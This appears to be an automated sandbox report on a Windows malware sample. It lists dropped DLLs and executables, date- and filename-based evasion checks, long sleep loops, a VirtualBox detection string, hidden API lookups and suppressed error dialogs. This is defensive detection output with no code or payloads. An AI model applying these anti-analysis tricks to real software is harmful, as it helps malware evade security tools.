Source: C:\Windows\System32\xcopy.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\decora_sse.dllJump to dropped file
Source: C:\Windows\System32\xcopy.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\t2k.dllJump to dropped file
Source: C:\Windows\System32\xcopy.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\prism_common.dllJump to dropped file
Source: C:\Windows\System32\xcopy.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\jfr.dllJump to dropped file
Source: C:\Windows\System32\xcopy.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\prism_d3d.dllJump to dropped file
Source: C:\Windows\System32\xcopy.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\splashscreen.dllJump to dropped file
Source: C:\Windows\System32\xcopy.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\dtplugin\deployJava1.dllJump to dropped file
Source: C:\Windows\System32\xcopy.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\j2pkcs11.dllJump to dropped file
Source: C:\Windows\System32\xcopy.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\javafx_font_t2k.dllJump to dropped file
Source: C:\Windows\System32\xcopy.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\klist.exeJump to dropped file
Source: C:\Windows\System32\xcopy.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\tnameserv.exeJump to dropped file
Source: C:\Windows\System32\xcopy.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\javaws.exeJump to dropped file
Source: C:\Windows\System32\xcopy.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\javacpl.cplJump to dropped file
Source: C:\Windows\System32\xcopy.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\dt_shmem.dllJump to dropped file
Source: C:\Windows\System32\xcopy.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\javafx_iio.dllJump to dropped file
Source: C:\Windows\System32\xcopy.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\ssvagent.exeJump to dropped file
Source: C:\Windows\System32\xcopy.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\glib-lite.dllJump to dropped file
Source: C:\Windows\System32\xcopy.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\servertool.exeJump to dropped file
Source: C:\Windows\System32\xcopy.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\rmid.exeJump to dropped file
Source: C:\Windows\System32\xcopy.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\gstreamer-lite.dllJump to dropped file
Source: C:\Windows\System32\xcopy.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\rmiregistry.exeJump to dropped file
Source: C:\Windows\System32\xcopy.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\ktab.exeJump to dropped file
Source: C:\Windows\System32\xcopy.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\deploy.dllJump to dropped file
Source: C:\Windows\System32\xcopy.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\instrument.dllJump to dropped file
Source: C:\Windows\System32\xcopy.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\pack200.exeJump to dropped file
Source: C:\Windows\System32\xcopy.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\lcms.dllJump to dropped file
Source: C:\Windows\System32\xcopy.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\dt_socket.dllJump to dropped file
Source: C:\Windows\System32\xcopy.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\unpack.dllJump to dropped file
Source: C:\Windows\System32\xcopy.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\jp2ssv.dllJump to dropped file
Source: C:\Windows\System32\xcopy.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\dcpr.dllJump to dropped file
Source: C:\Windows\System32\xcopy.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\orbd.exeJump to dropped file
Source: C:\Windows\System32\xcopy.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\kcms.dllJump to dropped file
Source: C:\Windows\System32\xcopy.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\jp2launcher.exeJump to dropped file
Source: C:\Windows\System32\xcopy.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\jdwp.dllJump to dropped file
Source: C:\Windows\System32\xcopy.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\eula.dllJump to dropped file
Source: C:\Windows\System32\xcopy.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\w2k_lsa_auth.dllJump to dropped file
Source: C:\Windows\System32\xcopy.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\npt.dllJump to dropped file
Source: C:\Windows\System32\xcopy.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\jsdt.dllJump to dropped file
Source: C:\Windows\System32\xcopy.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\jsoundds.dllJump to dropped file
Source: C:\Windows\System32\xcopy.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\jpeg.dllJump to dropped file
Source: C:\Windows\System32\xcopy.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\keytool.exeJump to dropped file
Source: C:\Windows\System32\xcopy.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\prism_sw.dllJump to dropped file
Source: C:\Windows\System32\xcopy.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\policytool.exeJump to dropped file
Source: C:\Windows\System32\xcopy.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\java-rmi.exeJump to dropped file
Source: C:\Windows\System32\xcopy.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\hprof.dllJump to dropped file
Source: C:\Windows\System32\xcopy.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\j2pcsc.dllJump to dropped file
Found evasive API chain (date check)Show sources
Source: C:\Windows\InstallDir\Server.exeEvasive API call chain: GetSystemTime,DecisionNodes
Source: C:\Windows\System32\svchost.exeEvasive API call chain: GetSystemTime,DecisionNodesgraph_5-9485
Found evasive API chain (may stop execution after checking a module file name)Show sources
Source: C:\Users\user\AppData\Local\Temp\server.exeEvasive API call chain: GetModuleFileName,DecisionNodes,ExitProcessgraph_3-10192
Source: C:\Windows\InstallDir\Server.exeEvasive API call chain: GetModuleFileName,DecisionNodes,ExitProcess
Found large amount of non-executed APIsShow sources
Source: C:\Users\user\AppData\Local\Temp\server.exeAPI coverage: 8.6 %
Source: C:\Windows\System32\svchost.exeAPI coverage: 3.3 %
Source: C:\Program Files\Internet Explorer\iexplore.exeAPI coverage: 2.3 %
Source: C:\Users\user\AppData\Local\Temp\358saxio.exeAPI coverage: 9.9 %
Source: C:\Windows\InstallDir\Server.exeAPI coverage: 3.7 %
May sleep (evasive loops) to hinder dynamic analysisShow sources
Source: C:\Windows\System32\svchost.exe TID: 3692Thread sleep time: -80000s >= -60000sJump to behavior
Source: C:\Windows\System32\svchost.exe TID: 1716Thread sleep time: -360000s >= -60000sJump to behavior
Source: C:\Windows\explorer.exe TID: 3796Thread sleep time: -120000s >= -60000sJump to behavior
Source: C:\Windows\explorer.exe TID: 3828Thread sleep time: -60000s >= -60000sJump to behavior
Source: C:\Windows\explorer.exe TID: 3908Thread sleep time: -180000s >= -60000sJump to behavior
Source: C:\Windows\explorer.exe TID: 2624Thread sleep time: -60000s >= -60000sJump to behavior
Source: C:\Windows\explorer.exe TID: 3936Thread sleep time: -180000s >= -60000s
Source: C:\Windows\explorer.exe TID: 2444Thread sleep time: -60000s >= -60000s
Source: C:\Windows\explorer.exe TID: 3952Thread sleep time: -60000s >= -60000s
Source: C:\Windows\explorer.exe TID: 4016Thread sleep time: -60000s >= -60000s
Source: C:\Users\user\AppData\Local\Temp\358saxio.exe TID: 2176Thread sleep time: -60000s >= -60000s
Source: C:\Windows\System32\cscript.exe TID: 2668Thread sleep time: -240000s >= -60000s
Source: C:\Windows\System32\cscript.exe TID: 2616Thread sleep time: -60000s >= -60000s
Source: C:\Windows\explorer.exe TID: 2380Thread sleep time: -120000s >= -60000s
Source: C:\Windows\explorer.exe TID: 1324Thread sleep time: -60000s >= -60000s
Source: C:\Windows\System32\cscript.exe TID: 2456Thread sleep time: -60000s >= -60000s
Source: C:\Windows\System32\cscript.exe TID: 2340Thread sleep time: -60000s >= -60000s
Sample execution stops while process was sleeping (likely an evasion)Show sources
Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
Contains functionality to enumerate / list files inside a directoryShow sources
Source: C:\Users\user\AppData\Local\Temp\server.exeCode function: 3_2_00C835B0 FindFirstFileW,CloseHandle,3_2_00C835B0
Source: C:\Users\user\AppData\Local\Temp\server.exeCode function: 3_1_00C835B0 FindFirstFileW,CloseHandle,3_1_00C835B0
Source: C:\Windows\System32\svchost.exeCode function: 5_2_00C835B0 FindFirstFileW,CloseHandle,5_2_00C835B0
Source: C:\Program Files\Internet Explorer\iexplore.exeCode function: 6_2_00C835B0 FindFirstFileW,CloseHandle,6_2_00C835B0
Source: C:\Users\user\AppData\Local\Temp\358saxio.exeCode function: 12_2_00405FAC GetModuleHandleA,GetProcAddress,lstrcpyn,lstrcpyn,lstrcpyn,FindFirstFileA,FindClose,lstrlen,lstrcpyn,lstrlen,lstrcpyn,12_2_00405FAC
Source: C:\Windows\InstallDir\Server.exeCode function: 15_2_00C835B0 FindFirstFileW,CloseHandle,15_2_00C835B0
Source: C:\Windows\InstallDir\Server.exeCode function: 15_1_00C835B0 FindFirstFileW,CloseHandle,15_1_00C835B0
May try to detect the virtual machine to hinder analysis (VM artifact strings found in memory)Show sources
Source: server.exe, svchost.exe, iexplore.exe, explorer.exe, Server.exeBinary or memory string: trhgtehgfsgrfgtrwegtre
Source: Server.exeBinary or memory string: VBoxService.exe
Program exit pointsShow sources
Source: C:\Users\user\AppData\Local\Temp\server.exeAPI call chain: ExitProcess graph end nodegraph_3-9809
Source: C:\Users\user\AppData\Local\Temp\server.exeAPI call chain: ExitProcess graph end nodegraph_3-9813
Source: C:\Users\user\AppData\Local\Temp\server.exeAPI call chain: ExitProcess graph end nodegraph_3-9827
Source: C:\Users\user\AppData\Local\Temp\server.exeAPI call chain: ExitProcess graph end nodegraph_3-9967
Source: C:\Users\user\AppData\Local\Temp\server.exeAPI call chain: ExitProcess graph end nodegraph_3-9801
Source: C:\Users\user\AppData\Local\Temp\server.exeAPI call chain: ExitProcess graph end nodegraph_3-9966
Source: C:\Users\user\AppData\Local\Temp\server.exeAPI call chain: ExitProcess graph end nodegraph_3-9820
Source: C:\Users\user\AppData\Local\Temp\server.exeAPI call chain: ExitProcess graph end nodegraph_3-9821
Source: C:\Users\user\AppData\Local\Temp\server.exeAPI call chain: ExitProcess graph end nodegraph_3-9847
Source: C:\Users\user\AppData\Local\Temp\server.exeAPI call chain: ExitProcess graph end nodegraph_3-9815
Source: C:\Users\user\AppData\Local\Temp\server.exeAPI call chain: ExitProcess graph end nodegraph_3-9818
Source: C:\Users\user\AppData\Local\Temp\server.exeAPI call chain: ExitProcess graph end nodegraph_3-9790
Source: C:\Users\user\AppData\Local\Temp\server.exeAPI call chain: ExitProcess graph end nodegraph_3-9337
Source: C:\Users\user\AppData\Local\Temp\server.exeAPI call chain: ExitProcess graph end nodegraph_3-9934
Source: C:\Users\user\AppData\Local\Temp\server.exeAPI call chain: ExitProcess graph end nodegraph_3-9791
Source: C:\Users\user\AppData\Local\Temp\server.exeAPI call chain: ExitProcess graph end nodegraph_3-9795
Source: C:\Users\user\AppData\Local\Temp\server.exeAPI call chain: ExitProcess graph end nodegraph_3-9779
Source: C:\Users\user\AppData\Local\Temp\server.exeAPI call chain: ExitProcess graph end nodegraph_3-9824
Source: C:\Users\user\AppData\Local\Temp\server.exeAPI call chain: ExitProcess graph end nodegraph_3-9825
Source: C:\Windows\System32\svchost.exeAPI call chain: ExitProcess graph end nodegraph_5-9449
Source: C:\Program Files\Internet Explorer\iexplore.exeAPI call chain: ExitProcess graph end nodegraph_6-9697
Source: C:\Program Files\Internet Explorer\iexplore.exeAPI call chain: ExitProcess graph end nodegraph_6-9696
Source: C:\Program Files\Internet Explorer\iexplore.exeAPI call chain: ExitProcess graph end nodegraph_6-9664
Source: C:\Windows\InstallDir\Server.exeAPI call chain: ExitProcess graph end node
Source: C:\Windows\InstallDir\Server.exeAPI call chain: ExitProcess graph end node
Source: C:\Windows\InstallDir\Server.exeAPI call chain: ExitProcess graph end node
Source: C:\Windows\InstallDir\Server.exeAPI call chain: ExitProcess graph end node
Source: C:\Windows\InstallDir\Server.exeAPI call chain: ExitProcess graph end node
Source: C:\Windows\InstallDir\Server.exeAPI call chain: ExitProcess graph end node
Source: C:\Windows\InstallDir\Server.exeAPI call chain: ExitProcess graph end node
Source: C:\Windows\InstallDir\Server.exeAPI call chain: ExitProcess graph end node
Source: C:\Windows\InstallDir\Server.exeAPI call chain: ExitProcess graph end node
Source: C:\Windows\InstallDir\Server.exeAPI call chain: ExitProcess graph end node
Source: C:\Windows\InstallDir\Server.exeAPI call chain: ExitProcess graph end node
Source: C:\Windows\InstallDir\Server.exeAPI call chain: ExitProcess graph end node
Source: C:\Windows\InstallDir\Server.exeAPI call chain: ExitProcess graph end node
Source: C:\Windows\InstallDir\Server.exeAPI call chain: ExitProcess graph end node
Source: C:\Windows\InstallDir\Server.exeAPI call chain: ExitProcess graph end node
Source: C:\Windows\InstallDir\Server.exeAPI call chain: ExitProcess graph end node
Source: C:\Windows\InstallDir\Server.exeAPI call chain: ExitProcess graph end node
Source: C:\Windows\InstallDir\Server.exeAPI call chain: ExitProcess graph end node
Source: C:\Windows\InstallDir\Server.exeAPI call chain: ExitProcess graph end node
Source: C:\Windows\InstallDir\Server.exeAPI call chain: ExitProcess graph end node
Source: C:\Windows\InstallDir\Server.exeAPI call chain: ExitProcess graph end node

Hooking and other Techniques for Hiding and Protection:

barindex
Contains functionality to check if a window is minimized (may be used to check if an application is visible)Show sources
Source: C:\Users\user\AppData\Local\Temp\358saxio.exeCode function: 12_2_00447930 IsIconic,SetWindowPos,GetWindowPlacement,SetWindowPlacement,12_2_00447930
Source: C:\Users\user\AppData\Local\Temp\358saxio.exeCode function: 12_2_0045C73C PostMessageA,PostMessageA,SendMessageA,GetProcAddress,GetLastError,IsWindowEnabled,IsWindowVisible,GetFocus,SetFocus,SetFocus,IsIconic,GetFocus,SetFocus,12_2_0045C73C
Source: C:\Users\user\AppData\Local\Temp\358saxio.exeCode function: 12_2_0045CE6C IsIconic,SetActiveWindow,IsWindowEnabled,SetWindowPos,DefWindowProcA,12_2_0045CE6C
Source: C:\Users\user\AppData\Local\Temp\358saxio.exeCode function: 12_2_0045CF30 IsIconic,SetActiveWindow,IsWindowEnabled,DefWindowProcA,SetWindowPos,SetFocus,12_2_0045CF30
Source: C:\Users\user\AppData\Local\Temp\358saxio.exeCode function: 12_2_0041DD98 IsIconic,GetWindowPlacement,GetWindowRect,12_2_0041DD98
Source: C:\Users\user\AppData\Local\Temp\358saxio.exeCode function: 12_2_00448300 IsIconic,GetWindowPlacement,GetWindowRect,GetWindowLongA,GetWindowLongA,ScreenToClient,ScreenToClient,12_2_00448300
Source: C:\Users\user\AppData\Local\Temp\358saxio.exeCode function: 12_2_00459200 SendMessageA,ShowWindow,ShowWindow,CallWindowProcA,SendMessageA,ShowWindow,SetWindowPos,GetActiveWindow,IsIconic,SetWindowPos,SetActiveWindow,ShowWindow,ShowWindow,12_2_00459200
Source: C:\Users\user\AppData\Local\Temp\358saxio.exeCode function: 12_2_00447028 IsIconic,GetCapture,12_2_00447028
Extensive use of GetProcAddress (often used to hide API calls)Show sources
Source: C:\Users\user\AppData\Local\Temp\server.exeCode function: 3_2_00C87E20 GetModuleHandleA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,3_2_00C87E20
Disables application error messsages (SetErrorMode)Show sources
Source: C:\Users\user\Desktop\sxz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\sxz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\sxz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\sxz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\sxz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\sxz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\sxz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\sxz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\sxz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\sxz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\sxz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\server.exeProcess information set: NOALIGNMENTFAULTEXCEPT and NOGPFAULTERRORBOX and NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\server.exeProcess information set: NOALIGNMENTFAULTEXCEPT and NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\server.exeProcess information set: NOALIGNMENTFAULTEXCEPT and NOGPFAULTERRORBOX and NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\server.exeProcess information set: NOALIGNMENTFAULTEXCEPT and NOGPFAULTERRORBOX and NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\server.exeProcess information set: NOALIGNMENTFAULTEXCEPT and NOGPFAULTERRORBOX and NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\server.exeProcess information set: NOALIGNMENTFAULTEXCEPT and NOGPFAULTERRORBOX and NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\server.exeProcess information set: NOALIGNMENTFAULTEXCEPT and NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\server.exeProcess information set: NOALIGNMENTFAULTEXCEPT and NOGPFAULTERRORBOX and NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\server.exeProcess information set: NOALIGNMENTFAULTEXCEPT and NOGPFAULTERRORBOX and NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\server.exeProcess information set: NOALIGNMENTFAULTEXCEPT and NOGPFAULTERRORBOX and NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\server.exeProcess information set: NOALIGNMENTFAULTEXCEPT and NOGPFAULTERRORBOX and NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\server.exeProcess information set: NOALIGNMENTFAULTEXCEPT and NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\server.exeProcess information set: NOALIGNMENTFAULTEXCEPT and NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\server.exeProcess information set: NOALIGNMENTFAULTEXCEPT and NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\server.exeProcess information set: NOALIGNMENTFAULTEXCEPT and NOGPFAULTERRORBOX and NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Java\jre1.8.0_40\bin\javaw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Java\jre1.8.0_40\bin\javaw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Java\jre1.8.0_40\bin\javaw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Java\jre1.8.0_40\bin\javaw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Java\jre1.8.0_40\bin\javaw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\svchost.exeProcess information set: NOALIGNMENTFAULTEXCEPT and NOGPFAULTERRORBOX and NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\svchost.exeProcess information set: NOALIGNMENTFAULTEXCEPT and NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\svchost.exeProcess information set: NOALIGNMENTFAULTEXCEPT and NOGPFAULTERRORBOX and NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\svchost.exeProcess information set: NOALIGNMENTFAULTEXCEPT and NOGPFAULTERRORBOX and NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\svchost.exeProcess information set: NOALIGNMENTFAULTEXCEPT and NOGPFAULTERRORBOX and NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\svchost.exeProcess information set: NOALIGNMENTFAULTEXCEPT and NOGPFAULTERRORBOX and NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\358saxio.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\358saxio.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\358saxio.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\InstallDir\Server.exeProcess information set: NOALIGNMENTFAULTEXCEPT and NOGPFAULTERRORBOX and NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\358saxio.exeProcess information set: NOGPFAULTERRORBOX
Source: C:\Users\user\AppData\Local\Temp\358saxio.exeProcess information set: NOGPFAULTERRORBOX
Source: C:\Users\user\AppData\Local\Temp\358saxio.exeProcess information set: NOGPFAULTERRORBOX
Source: C:\Users\user\AppData\Local\Temp\358saxio.exeProcess information set: NOGPFAULTERRORBOX
Source: C:\Users\user\AppData\Local\Temp\358saxio.exeProcess information set: NOGPFAULTERRORBOX
Source: C:\Users\user\AppData\Local\Temp\358saxio.exeProcess information set: NOGPFAULTERRORBOX
Source: C:\Users\user\AppData\Local\Temp\358saxio.exeProcess information set: NOGPFAULTERRORBOX
Source: C:\Users\user\AppData\Local\Temp\358saxio.exeProcess information set: NOGPFAULTERRORBOX
Source: C:\Users\user\AppData\Local\Temp\358saxio.exeProcess information set: NOGPFAULTERRORBOX
Source: C:\Users\user\AppData\Local\Temp\358saxio.exeProcess information set: NOGPFAULTERRORBOX
Source: C:\Users\user\AppData\Local\Temp\358saxio.exeProcess information set: NOGPFAULTERRORBOX
Source: C:\Users\user\AppData\Local\Temp\358saxio.exeProcess information set: NOGPFAULTERRORBOX
Source: C:\Users\user\AppData\Local\Temp\358saxio.exeProcess information set: NOGPFAULTERRORBOX
Source: C:\Users\user\AppData\Local\Temp\358saxio.exeProcess information set: NOGPFAULTERRORBOX
Source: C:\Users\user\AppData\Local\Temp\358saxio.exeProcess information set: NOGPFAULTERRORBOX
Source: C:\Users\user\AppData\Local\Temp\358saxio.exeProcess information set: NOGPFAULTERRORBOX
Source: C:\Users\user\AppData\Local\Temp\358saxio.exeProcess information set: NOGPFAULTERRORBOX
Source: C:\Users\user\AppData\Local\Temp\358saxio.exeProcess information set: NOGPFAULTERRORBOX
Source: C:\Users\user\AppData\Local\Temp\358saxio.exeProcess information set: NOGPFAULTERRORBOX
Source: C:\Users\user\AppData\Local\Temp\358saxio.exeProcess information set: NOGPFAULTERRORBOX
Source: C:\Users\user\AppData\Local\Temp\358saxio.exeProcess information set: NOGPFAULTERRORBOX
Source: C:\Users\user\AppData\Local\Temp\358saxio.exeProcess information set: NOGPFAULTERRORBOX
Source: C:\Users\user\AppData\Local\Temp\358saxio.exeProcess information set: NOGPFAULTERRORBOX
Source: C:\Users\user\AppData\Local\Temp\358saxio.exeProcess information set: NOGPFAULTERRORBOX
Source: C:\Users\user\AppData\Local\Temp\358saxio.exeProcess information set: NOGPFAULTERRORBOX
Source: C:\Users\user\AppData\Local\Temp\358saxio.exeProcess information set: NOGPFAULTERRORBOX
Source: C:\Users\user\AppData\Local\Temp\358saxio.exeProcess information set: NOGPFAULTERRORBOX
Source: C:\Users\user\AppData\Local\Temp\358saxio.exeProcess information set: NOGPFAULTERRORBOX
Source: C:\Users\user\AppData\Local\Temp\358saxio.exeProcess information set: NOGPFAULTERRORBOX
Source: C:\Users\user\AppData\Local\Temp\358saxio.exeProcess information set: NOGPFAULTERRORBOX
Source: C:\Users\user\AppData\Local\Temp\358saxio.exeProcess information set: NOGPFAULTERRORBOX
Source: C:\Users\user\AppData\Local\Temp\358saxio.exeProcess information set: NOGPFAULTERRORBOX
Source: C:\Users\user\AppData\Local\Temp\358saxio.exeProcess information set: NOGPFAULTERRORBOX
Source: C:\Users\user\AppData\Local\Temp\358saxio.exeProcess information set: NOGPFAULTERRORBOX
Source: C:\Users\user\AppData\Local\Temp\358saxio.exeProcess information set: NOGPFAULTERRORBOX
Source: C:\Users\user\AppData\Local\Temp\358saxio.exeProcess information set: NOGPFAULTERRORBOX
Source: C:\Users\user\AppData\Local\Temp\358saxio.exeProcess information set: NOGPFAULTERRORBOX
Source: C:\Users\user\AppData\Local\Temp\358saxio.exeProcess information set: NOGPFAULTERRORBOX
Source: C:\Users\user\AppData\Local\Temp\358saxio.exeProcess information set: NOGPFAULTERRORBOX
Source: C:\Users\user\AppData\Local\Temp\358saxio.exeProcess information set: NOGPFAULTERRORBOX
Source: C:\Users\user\AppData\Local\Temp\358saxio.exeProcess information set: NOGPFAULTERRORBOX
Source: C:\Users\user\AppData\Local\Temp\358saxio.exeProcess information set: NOGPFAULTERRORBOX
Source: C:\Users\user\AppData\Local\Temp\358saxio.exeProcess information set: NOGPFAULTERRORBOX
Source: C:\Users\user\AppData\Local\Temp\358saxio.exeProcess information set: NOGPFAULTERRORBOX
Source: C:\Users\user\AppData\Local\Temp\358saxio.exeProcess information set: NOGPFAULTERRORBOX
Source: C:\Users\user\AppData\Local\Temp\358saxio.exeProcess information set: NOGPFAULTERRORBOX
Source: C:\Users\user\AppData\Local\Temp\358saxio.exeProcess information set: NOGPFAULTERRORBOX
Source: C:\Users\user\AppData\Local\Temp\358saxio.exeProcess information set: NOGPFAULTERRORBOX
Source: C:\Users\user\AppData\Local\Temp\358saxio.exeProcess information set: NOGPFAULTERRORBOX
Source: C:\Users\user\AppData\Local\Temp\358saxio.exeProcess information set: NOGPFAULTERRORBOX
Source: C:\Users\user\AppData\Local\Temp\358saxio.exeProcess information set: NOGPFAULTERRORBOX
Source: C:\Users\user\AppData\Local\Temp\358saxio.exeProcess information set: NOGPFAULTERRORBOX
Source: C:\Users\user\AppData\Local\Temp\358saxio.exeProcess information set: NOGPFAULTERRORBOX
Source: C:\Users\user\AppData\Local\Temp\358saxio.exeProcess information set: NOGPFAULTERRORBOX
Source: C:\Users\user\AppData\Local\Temp\358saxio.exeProcess information set: NOGPFAULTERRORBOX
Source: C:\Users\user\AppData\Local\Temp\358saxio.exeProcess information set: NOGPFAULTERRORBOX
Source: C:\Users\user\AppData\Local\Temp\358saxio.exeProcess information set: NOGPFAULTERRORBOX
Source: C:\Users\user\AppData\Local\Temp\358saxio.exeProcess information set: NOGPFAULTERRORBOX
Source: C:\Users\user\AppData\Local\Temp\358saxio.exeProcess information set: NOGPFAULTERRORBOX
Source: C:\Users\user\AppData\Local\Temp\358saxio.exeProcess information set: NOGPFAULTERRORBOX
Source: C:\Users\user\AppData\Local\Temp\358saxio.exeProcess information set: NOGPFAULTERRORBOX
Source: C:\Users\user\AppData\Local\Temp\358saxio.exeProcess information set: NOGPFAULTERRORBOX
Source: C:\Users\user\AppData\Local\Temp\358saxio.exeProcess information set: NOGPFAULTERRORBOX
Source: C:\Users\user\AppData\Local\Temp\358saxio.exeProcess information set: NOGPFAULTERRORBOX
